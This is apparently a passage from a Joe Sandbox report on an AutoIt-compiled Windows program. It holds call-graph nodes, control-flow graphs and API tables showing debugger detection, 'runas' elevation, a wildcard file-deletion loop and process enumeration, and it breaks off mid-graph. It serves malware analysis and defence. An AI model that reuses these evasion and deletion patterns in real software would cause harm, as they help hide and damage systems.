104903->104902 104904 dd90c5 __fread_nolock 38 API calls 104903->104904 104910 dcd2e8 26 API calls 4 library calls 104903->104910 104904->104903 104905->104887 104906->104882 104907->104882 104908->104896 104909->104898 104910->104903 104911->104896 104915 dce858 104912->104915 104914 e1311c 104918 dce7d9 104915->104918 104917 dce875 104917->104914 104919 dce7fc 104918->104919 104920 dce7e8 104918->104920 104925 dce7f8 __alldvrm 104919->104925 104928 dd36b2 11 API calls 2 library calls 104919->104928 104926 dcf649 20 API calls __dosmaperr 104920->104926 104922 dce7ed 104927 dd2b5c 26 API calls __wsopen_s 104922->104927 104925->104917 104926->104922 104927->104925 104928->104925 105077->104475 105078 daf4c0 105081 dba025 105078->105081 105080 daf4cc 105082 dba046 105081->105082 105083 dba0a3 105081->105083 105082->105083 105086 db0340 207 API calls 105082->105086 105085 dba0e7 105083->105085 105090 e13fe1 81 API calls __wsopen_s 105083->105090 105085->105080 105088 dba077 105086->105088 105087 df806b 105087->105087 105088->105083 105088->105085 105089 dabed9 8 API calls 105088->105089 105089->105083 105090->105087 105091 df1ac5 105092 df1acd 105091->105092 105095 dad535 105091->105095 105122 e07a87 8 API calls __fread_nolock 105092->105122 105094 df1adf 105123 e07a00 8 API calls __fread_nolock 105094->105123 105098 dc014b 8 API calls 105095->105098 105097 df1b09 105099 db0340 207 API calls 105097->105099 105100 dad589 105098->105100 105101 df1b30 105099->105101 105103 dac32d 8 API calls 105100->105103 105102 df1b44 105101->105102 105124 e261a2 53 API calls _wcslen 105101->105124 105106 dad5b3 105103->105106 105105 df1b61 105105->105095 105125 e07a87 8 API calls __fread_nolock 105105->105125 105107 dc014b 8 API calls 105106->105107 105115 dad66e messages 105107->105115 105109 dac3ab 8 API calls 105119 dad9ac messages 105109->105119 105110 dabed9 8 API calls 105110->105115 105111 dab4c8 8 API calls 105111->105115 105113 df1f79 105126 e056ae 8 API calls messages 105113->105126 105114 df1f94 105115->105110 105115->105111 105115->105113 105115->105114 105117 dac3ab 8 API calls 105115->105117 105118 dad911 messages 105115->105118 105117->105115 105118->105109 105118->105119 105120 dad9c3 105119->105120 105121 dbe30a 8 API calls messages 105119->105121 105121->105119 105122->105094 105123->105097 105124->105105 105125->105105 105126->105114 105127 da1044 105132 da2793 105127->105132 105129 da104a 105168 dc0413 29 API calls __onexit 105129->105168 105131 da1054 105169 da2a38 105132->105169 105136 da280a 105137 dabf73 8 API calls 105136->105137 105138 da2814 105137->105138 105139 dabf73 8 API calls 105138->105139 105140 da281e 105139->105140 105141 dabf73 8 API calls 105140->105141 105142 da2828 105141->105142 105143 dabf73 8 API calls 105142->105143 105144 da2866 105143->105144 105145 dabf73 8 API calls 105144->105145 105146 da2932 105145->105146 105179 da2dbc 105146->105179 105150 da2964 105151 dabf73 8 API calls 105150->105151 105152 da296e 105151->105152 105153 db3160 9 API calls 105152->105153 105154 da2999 105153->105154 105206 da3166 105154->105206 105156 da29b5 105157 da29c5 GetStdHandle 105156->105157 105158 da2a1a 105157->105158 105159 de39e7 105157->105159 105162 da2a27 OleInitialize 105158->105162 105159->105158 105160 de39f0 105159->105160 105161 dc014b 8 API calls 105160->105161 105163 de39f7 105161->105163 105162->105129 105213 e10ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 105163->105213 105165 de3a00 105214 e112eb CreateThread 105165->105214 105167 de3a0c CloseHandle 105167->105158 105168->105131 105215 da2a91 105169->105215 105172 da2a91 8 API calls 105173 da2a70 105172->105173 105174 dabf73 8 API calls 105173->105174 105175 da2a7c 105174->105175 105176 da8577 8 API calls 105175->105176 105177 da27c9 105176->105177 105178 da327e 6 API calls 105177->105178 105178->105136 105180 dabf73 8 API calls 105179->105180 105181 da2dcc 105180->105181 105182 dabf73 8 API calls 105181->105182 105183 da2dd4 105182->105183 105222 da81d6 105183->105222 105186 da81d6 8 API calls 105187 da2de4 105186->105187 105188 dabf73 8 API calls 105187->105188 105189 da2def 105188->105189 105190 dc014b 8 API calls 105189->105190 105191 da293c 105190->105191 105192 da3205 105191->105192 105193 da3213 105192->105193 105194 dabf73 8 API calls 105193->105194 105195 da321e 105194->105195 105196 dabf73 8 API calls 105195->105196 105197 da3229 105196->105197 105198 dabf73 8 API calls 105197->105198 105199 da3234 105198->105199 105200 dabf73 8 API calls 105199->105200 105201 da323f 105200->105201 105202 da81d6 8 API calls 105201->105202 105203 da324a 105202->105203 105204 dc014b 8 API calls 105203->105204 105205 da3251 RegisterWindowMessageW 105204->105205 105205->105150 105207 de3c8f 105206->105207 105208 da3176 105206->105208 105225 e13c4e 8 API calls 105207->105225 105209 dc014b 8 API calls 105208->105209 105211 da317e 105209->105211 105211->105156 105212 de3c9a 105213->105165 105214->105167 105226 e112d1 14 API calls 105214->105226 105216 dabf73 8 API calls 105215->105216 105217 da2a9c 105216->105217 105218 dabf73 8 API calls 105217->105218 105219 da2aa4 105218->105219 105220 dabf73 8 API calls 105219->105220 105221 da2a66 105220->105221 105221->105172 105223 dabf73 8 API calls 105222->105223 105224 da2ddc 105223->105224 105224->105186 105225->105212 105227 daf5e5 105228 dacab0 207 API calls 105227->105228 105229 daf5f3 105228->105229 105230 dd8782 105235 dd853e 105230->105235 105233 dd87aa 105240 dd856f try_get_first_available_module 105235->105240 105237 dd876e 105254 dd2b5c 26 API calls __wsopen_s 105237->105254 105239 dd86c3 105239->105233 105247 de0d04 105239->105247 105243 dd86b8 105240->105243 105250 dc917b 40 API calls 2 library calls 105240->105250 105242 dd870c 105242->105243 105251 dc917b 40 API calls 2 library calls 105242->105251 105243->105239 105253 dcf649 20 API calls __dosmaperr 105243->105253 105245 dd872b 105245->105243 105252 dc917b 40 API calls 2 library calls 105245->105252 105255 de0401 105247->105255 105249 de0d1f 105249->105233 105250->105242 105251->105245 105252->105243 105253->105237 105254->105239 105258 de040d CallCatchBlock 105255->105258 105256 de041b 105313 dcf649 20 API calls __dosmaperr 105256->105313 105258->105256 105260 de0454 105258->105260 105259 de0420 105314 dd2b5c 26 API calls __wsopen_s 105259->105314 105266 de09db 105260->105266 105265 de042a __wsopen_s 105265->105249 105316 de07af 105266->105316 105269 de0a0d 105348 dcf636 20 API calls __dosmaperr 105269->105348 105270 de0a26 105334 dd5594 105270->105334 105273 de0a2b 105275 de0a4b 105273->105275 105276 de0a34 105273->105276 105274 de0a12 105349 dcf649 20 API calls __dosmaperr 105274->105349 105347 de071a CreateFileW 105275->105347 105350 dcf636 20 API calls __dosmaperr 105276->105350 105280 de0a39 105351 dcf649 20 API calls __dosmaperr 105280->105351 105281 de0478 105315 de04a1 LeaveCriticalSection __wsopen_s 105281->105315 105283 de0b01 GetFileType 105284 de0b0c GetLastError 105283->105284 105285 de0b53 105283->105285 105354 dcf613 20 API calls __dosmaperr 105284->105354 105356 dd54dd 21 API calls 2 library calls 105285->105356 105286 de0ad6 GetLastError 105353 dcf613 20 API calls __dosmaperr 105286->105353 105288 de0a84 105288->105283 105288->105286 105352 de071a CreateFileW 105288->105352 105290 de0b1a CloseHandle 105290->105274 105292 de0b43 105290->105292 105355 dcf649 20 API calls __dosmaperr 105292->105355 105294 de0ac9 105294->105283 105294->105286 105296 de0b74 105298 de0bc0 105296->105298 105357 de092b 72 API calls 3 library calls 105296->105357 105297 de0b48 105297->105274 105302 de0bed 105298->105302 105358 de04cd 72 API calls 4 library calls 105298->105358 105301 de0be6 105301->105302 105303 de0bfe 105301->105303 105359 dd8a2e 105302->105359 105303->105281 105305 de0c7c CloseHandle 105303->105305 105374 de071a CreateFileW 105305->105374 105307 de0ca7 105308 de0cdd 105307->105308 105309 de0cb1 GetLastError 105307->105309 105308->105281 105375 dcf613 20 API calls __dosmaperr 105309->105375 105311 de0cbd 105376 dd56a6 21 API calls 2 library calls 105311->105376 105313->105259 105314->105265 105315->105265 105317 de07ea 105316->105317 105318 de07d0 105316->105318 105377 de073f 105317->105377 105318->105317 105384 dcf649 20 API calls __dosmaperr 105318->105384 105321 de07df 105385 dd2b5c 26 API calls __wsopen_s 105321->105385 105323 de0822 105324 de0851 105323->105324 105386 dcf649 20 API calls __dosmaperr 105323->105386 105332 de08a4 105324->105332 105388 dcda7d 26 API calls 2 library calls 105324->105388 105327 de089f 105329 de091e 105327->105329 105327->105332 105328 de0846 105387 dd2b5c 26 API calls __wsopen_s 105328->105387 105389 dd2b6c 11 API calls _abort 105329->105389 105332->105269 105332->105270 105333 de092a 105335 dd55a0 CallCatchBlock 105334->105335 105392 dd32d1 EnterCriticalSection 105335->105392 105337 dd55cc 105340 dd5373 __wsopen_s 21 API calls 105337->105340 105338 dd55a7 105338->105337 105343 dd563a EnterCriticalSection 105338->105343 105346 dd55ee 105338->105346 105342 dd55d1 105340->105342 105341 dd5617 __wsopen_s 105341->105273 105342->105346 105396 dd54ba EnterCriticalSection 105342->105396 105344 dd5647 LeaveCriticalSection 105343->105344 105343->105346 105344->105338 105393 dd569d 105346->105393 105347->105288 105348->105274 105349->105281 105350->105280 105351->105274 105352->105294 105353->105274 105354->105290 105355->105297 105356->105296 105357->105298 105358->105301 105360 dd5737 __wsopen_s 26 API calls 105359->105360 105363 dd8a3e 105360->105363 105361 dd8a44 105398 dd56a6 21 API calls 2 library calls 105361->105398 105363->105361 105364 dd8a76 105363->105364 105367 dd5737 __wsopen_s 26 API calls 105363->105367 105364->105361 105365 dd5737 __wsopen_s 26 API calls 105364->105365 105368 dd8a82 CloseHandle 105365->105368 105366 dd8a9c 105369 dd8abe 105366->105369 105399 dcf613 20 API calls __dosmaperr 105366->105399 105370 dd8a6d 105367->105370 105368->105361 105372 dd8a8e GetLastError 105368->105372 105369->105281 105371 dd5737 __wsopen_s 26 API calls 105370->105371 105371->105364 105372->105361 105374->105307 105375->105311 105376->105308 105380 de0757 105377->105380 105378 de0772 105378->105323 105380->105378 105390 dcf649 20 API calls __dosmaperr 105380->105390 105381 de0796 105391 dd2b5c 26 API calls __wsopen_s 105381->105391 105383 de07a1 105383->105323 105384->105321 105385->105317 105386->105328 105387->105324 105388->105327 105389->105333 105390->105381 105391->105383 105392->105338 105397 dd3319 LeaveCriticalSection 105393->105397 105395 dd56a4 105395->105341 105396->105346 105397->105395 105398->105366 105399->105369

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 461 da5fc8-da6037 call dabf73 GetVersionExW call da8577 466 de507d-de5090 461->466 467 da603d 461->467 468 de5091-de5095 466->468 469 da603f-da6041 467->469 470 de5098-de50a4 468->470 471 de5097 468->471 472 de50bc 469->472 473 da6047-da60a6 call daadf4 call da55dc 469->473 470->468 475 de50a6-de50a8 470->475 471->470 478 de50c3-de50cf 472->478 485 da60ac-da60ae 473->485 486 de5224-de522b 473->486 475->469 477 de50ae-de50b5 475->477 477->466 481 de50b7 477->481 479 da611c-da6136 GetCurrentProcess IsWow64Process 478->479 483 da6138 479->483 484 da6195-da619b 479->484 481->472 487 da613e-da614a 483->487 484->487 488 de5125-de5138 485->488 489 da60b4-da60b7 485->489 490 de522d 486->490 491 de524b-de524e 486->491 492 de5269-de526d GetSystemInfo 487->492 493 da6150-da615f LoadLibraryA 487->493 494 de513a-de5143 488->494 495 de5161-de5163 488->495 489->479 496 da60b9-da60f5 489->496 497 de5233 490->497 498 de5239-de5241 491->498 499 de5250-de525f 491->499 500 da619d-da61a7 GetSystemInfo 493->500 501 da6161-da616f GetProcAddress 493->501 503 de5145-de514b 494->503 504 de5150-de515c 494->504 506 de5198-de519b 495->506 507 de5165-de517a 495->507 496->479 505 da60f7-da60fa 496->505 497->498 498->491 499->497 508 de5261-de5267 499->508 502 da6177-da6179 500->502 501->500 509 da6171-da6175 GetNativeSystemInfo 501->509 510 da617b-da617c FreeLibrary 502->510 511 da6182-da6194 502->511 503->479 504->479 512 de50d4-de50e4 505->512 513 da6100-da610a 505->513 516 de519d-de51b8 506->516 517 de51d6-de51d9 506->517 514 de517c-de5182 507->514 515 de5187-de5193 507->515 508->498 509->502 510->511 518 de50e6-de50f2 512->518 519 de50f7-de5101 512->519 513->478 521 da6110-da6116 513->521 514->479 515->479 522 de51ba-de51c0 516->522 523 de51c5-de51d1 516->523 517->479 520 de51df-de5206 517->520 518->479 524 de5114-de5120 519->524 525 de5103-de510f 519->525 526 de5208-de520e 520->526 527 de5213-de521f 520->527 521->479 522->479 523->479 524->479 525->479 526->479 527->479
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 00DA5FF7
                                                                                                                                                                                • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00E3DC2C,00000000,?,?), ref: 00DA6123
                                                                                                                                                                              • IsWow64Process.KERNEL32(00000000,?,?), ref: 00DA612A
                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00DA6155
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DA6167
                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00DA6175
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 00DA617C
                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?), ref: 00DA61A1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                              • API String ID: 3290436268-3101561225
                                                                                                                                                                              • Opcode ID: 0d5d223fc0e0e97d97fd12863d738b6b48e2708330c33d103e55622b1eedc5fa
                                                                                                                                                                              • Instruction ID: 5a79a0d839bed7ec3c99e919b403769a1321ee19648b07ce68abe8d317f1ef53
                                                                                                                                                                              • Opcode Fuzzy Hash: 0d5d223fc0e0e97d97fd12863d738b6b48e2708330c33d103e55622b1eedc5fa
                                                                                                                                                                              • Instruction Fuzzy Hash: 0FA1A52180A3C6EFC711DB6BBC451957FA46B27344B0C58ADE688B72A6D22D85CCCB35

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00DA3368,?), ref: 00DA33BB
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00DA3368,?), ref: 00DA33CE
                                                                                                                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00E72418,00E72400,?,?,?,?,?,?,00DA3368,?), ref: 00DA343A
                                                                                                                                                                                • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
                                                                                                                                                                                • Part of subcall function 00DA425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DA3462,00E72418,?,?,?,?,?,?,?,00DA3368,?), ref: 00DA42A0
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00000001,00E72418,?,?,?,?,?,?,?,00DA3368,?), ref: 00DA34BB
                                                                                                                                                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00DE3CB0
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00E72418,?,?,?,?,?,?,?,00DA3368,?), ref: 00DE3CF1
                                                                                                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E631F4,00E72418,?,?,?,?,?,?,?,00DA3368), ref: 00DE3D7A
                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 00DE3D81
                                                                                                                                                                                • Part of subcall function 00DA34D3: GetSysColorBrush.USER32(0000000F), ref: 00DA34DE
                                                                                                                                                                                • Part of subcall function 00DA34D3: LoadCursorW.USER32(00000000,00007F00), ref: 00DA34ED
                                                                                                                                                                                • Part of subcall function 00DA34D3: LoadIconW.USER32(00000063), ref: 00DA3503
                                                                                                                                                                                • Part of subcall function 00DA34D3: LoadIconW.USER32(000000A4), ref: 00DA3515
                                                                                                                                                                                • Part of subcall function 00DA34D3: LoadIconW.USER32(000000A2), ref: 00DA3527
                                                                                                                                                                                • Part of subcall function 00DA34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DA353F
                                                                                                                                                                                • Part of subcall function 00DA34D3: RegisterClassExW.USER32(?), ref: 00DA3590
                                                                                                                                                                                • Part of subcall function 00DA35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DA35E1
                                                                                                                                                                                • Part of subcall function 00DA35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DA3602
                                                                                                                                                                                • Part of subcall function 00DA35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00DA3368,?), ref: 00DA3616
                                                                                                                                                                                • Part of subcall function 00DA35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00DA3368,?), ref: 00DA361F
                                                                                                                                                                                • Part of subcall function 00DA396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DA3A3C
                                                                                                                                                                              Strings
                                                                                                                                                                              • 0$, xrefs: 00DA3495
                                                                                                                                                                              • AutoIt, xrefs: 00DE3CA5
                                                                                                                                                                              • runas, xrefs: 00DE3D75
                                                                                                                                                                              • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00DE3CAA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                              • String ID: 0$$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                              • API String ID: 683915450-3328958999
                                                                                                                                                                              • Opcode ID: 771ef26eda6a14f8dc8cb388d2584941f3534a8a9fa8175a810b6541ba9059f7
                                                                                                                                                                              • Instruction ID: 352f9e3b531c216f872bf4bc01a0e6e6c40b31ea93b0449b8148e7eb4648e45c
                                                                                                                                                                              • Opcode Fuzzy Hash: 771ef26eda6a14f8dc8cb388d2584941f3534a8a9fa8175a810b6541ba9059f7
                                                                                                                                                                              • Instruction Fuzzy Hash: 95510330108385AEC711FF71AC05D6A7FA9EF96340F04142DF69A661A2DB64CA8DD772

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1980 e0dc54-e0dc9b call dabf73 * 3 call da5851 call e0eab0 1991 e0dcab-e0dcdc call da568e FindFirstFileW 1980->1991 1992 e0dc9d-e0dca6 call da6b7c 1980->1992 1996 e0dd4b-e0dd52 FindClose 1991->1996 1997 e0dcde-e0dce0 1991->1997 1992->1991 1999 e0dd56-e0dd78 call dabd98 * 3 1996->1999 1997->1996 1998 e0dce2-e0dce7 1997->1998 2000 e0dd26-e0dd38 FindNextFileW 1998->2000 2001 e0dce9-e0dd24 call dabed9 call da7bb5 call da6b7c DeleteFileW 1998->2001 2000->1997 2004 e0dd3a-e0dd40 2000->2004 2001->2000 2015 e0dd42-e0dd49 FindClose 2001->2015 2004->1997 2015->1999
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DA55D1,?,?,00DE4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DA5871
                                                                                                                                                                                • Part of subcall function 00E0EAB0: GetFileAttributesW.KERNEL32(?,00E0D840), ref: 00E0EAB1
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00E0DCCB
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E0DD1B
                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E0DD2C
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00E0DD43
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00E0DD4C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                              • API String ID: 2649000838-1173974218
                                                                                                                                                                              • Opcode ID: 6c5c250498d0976a25f9f0938762054355a95666582188e086dd722485b503e4
                                                                                                                                                                              • Instruction ID: b84284fa4d7a4ad57d30e0a9374fd6fe0a1ac5be47af93f5314d6cbace482bc3
                                                                                                                                                                              • Opcode Fuzzy Hash: 6c5c250498d0976a25f9f0938762054355a95666582188e086dd722485b503e4
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A31503100C3459FC201EB60DC859AFBBE8FE96314F445A5DF4D5A2192EB21D909C773
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00E0DDAC
                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00E0DDBA
                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00E0DDDA
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E0DE87
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                                              • Opcode ID: e893e8558a753cfb0741429a22b4cf1976a2dc5a551edf224748cfd2ce69d268
                                                                                                                                                                              • Instruction ID: c9bd8b2c847ac07fb86d167d237af1e4f4f55d54f3995007d2a6f03be6f3fb7d
                                                                                                                                                                              • Opcode Fuzzy Hash: e893e8558a753cfb0741429a22b4cf1976a2dc5a551edf224748cfd2ce69d268
                                                                                                                                                                              • Instruction Fuzzy Hash: 3F3161711083019FD710EF50DC85AAFBBE8EF95354F04092DF586971A1DB71D98ACBA2

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 0 dbac3e-dbb063 call da8ec0 call dbbc58 call dae6a0 7 dbb069-dbb073 0->7 8 df8584-df8591 0->8 9 dbb079-dbb07e 7->9 10 df896b-df8979 7->10 11 df8596-df85a5 8->11 12 df8593 8->12 13 df85b2-df85b4 9->13 14 dbb084-dbb090 call dbb5b6 9->14 17 df897e 10->17 18 df897b 10->18 15 df85aa 11->15 16 df85a7 11->16 12->11 21 df85bd 13->21 14->21 25 dbb096-dbb0a3 call dac98d 14->25 15->13 16->15 19 df8985-df898e 17->19 18->17 22 df8993 19->22 23 df8990 19->23 26 df85c7 21->26 27 df899c-df89eb call dae6a0 call dbbbbe * 2 22->27 23->22 33 dbb0ab-dbb0b4 25->33 31 df85cf-df85d2 26->31 65 dbb1e0-dbb1f5 27->65 66 df89f1-df8a03 call dbb5b6 27->66 34 dbb158-dbb16f 31->34 35 df85d8-df8600 call dc4cd3 call da7ad5 31->35 37 dbb0b8-dbb0d6 call dc4d98 33->37 40 df8954-df8957 34->40 41 dbb175 34->41 76 df862d-df8651 call da7b1a call dabd98 35->76 77 df8602-df8606 35->77 50 dbb0d8-dbb0e1 37->50 51 dbb0e5 37->51 45 df895d-df8960 40->45 46 df8a41-df8a79 call dae6a0 call dbbbbe 40->46 47 df88ff-df8920 call dae6a0 41->47 48 dbb17b-dbb17e 41->48 45->27 56 df8962-df8965 45->56 46->65 107 df8a7f-df8a91 call dbb5b6 46->107 47->65 69 df8926-df8938 call dbb5b6 47->69 57 df8729-df8743 call dbbbbe 48->57 58 dbb184-dbb187 48->58 50->37 59 dbb0e3 50->59 51->26 61 dbb0eb-dbb0fc 51->61 56->10 56->65 87 df888f-df88b5 call dae6a0 57->87 88 df8749-df874c 57->88 67 df86ca-df86e0 call da6c03 58->67 68 dbb18d-dbb190 58->68 59->61 61->10 70 dbb102-dbb11c 61->70 71 dbb1fb-dbb20b call dae6a0 65->71 72 df8ac9-df8acf 65->72 98 df8a2f-df8a3c call dac98d 66->98 99 df8a05-df8a0d 66->99 67->65 96 df86e6-df86fc call dbb5b6 67->96 79 df8656-df8659 68->79 80 dbb196-dbb1b8 call dae6a0 68->80 118 df893a-df8943 call dac98d 69->118 119 df8945 69->119 70->31 84 dbb122-dbb154 call dbbbbe call dae6a0 70->84 72->33 90 df8ad5 72->90 76->79 77->76 92 df8608-df862b call daad40 77->92 79->10 85 df865f-df8674 call da6c03 79->85 80->65 115 dbb1ba-dbb1cc call dbb5b6 80->115 84->34 85->65 137 df867a-df8690 call dbb5b6 85->137 87->65 124 df88bb-df88cd call dbb5b6 87->124 105 df87bf-df87de call dae6a0 88->105 106 df874e-df8751 88->106 90->10 92->76 92->77 145 df86fe-df870b call da8ec0 96->145 146 df870d-df8716 call da8ec0 96->146 152 df8ac2-df8ac4 98->152 113 df8a0f-df8a13 99->113 114 df8a1e-df8a29 call dab4b1 99->114 105->65 144 df87e4-df87f6 call dbb5b6 105->144 121 df8ada-df8ae8 106->121 122 df8757-df8774 call dae6a0 106->122 140 df8ab5-df8abe call dac98d 107->140 141 df8a93-df8a9b 107->141 113->114 130 df8a15-df8a19 113->130 114->98 163 df8b0b-df8b19 114->163 164 df86ba-df86c3 call dac98d 115->164 165 dbb1d2-dbb1de 115->165 136 df8949-df894f 118->136 119->136 128 df8aed-df8afd 121->128 129 df8aea 121->129 122->65 167 df877a-df878c call dbb5b6 122->167 170 df88cf-df88dc call dac98d 124->170 171 df88de 124->171 147 df8aff 128->147 148 df8b02-df8b06 128->148 129->128 149 df8aa1-df8aa3 130->149 136->65 179 df869d-df86ab call da8ec0 137->179 180 df8692-df869b call dac98d 137->180 140->152 156 df8a9d 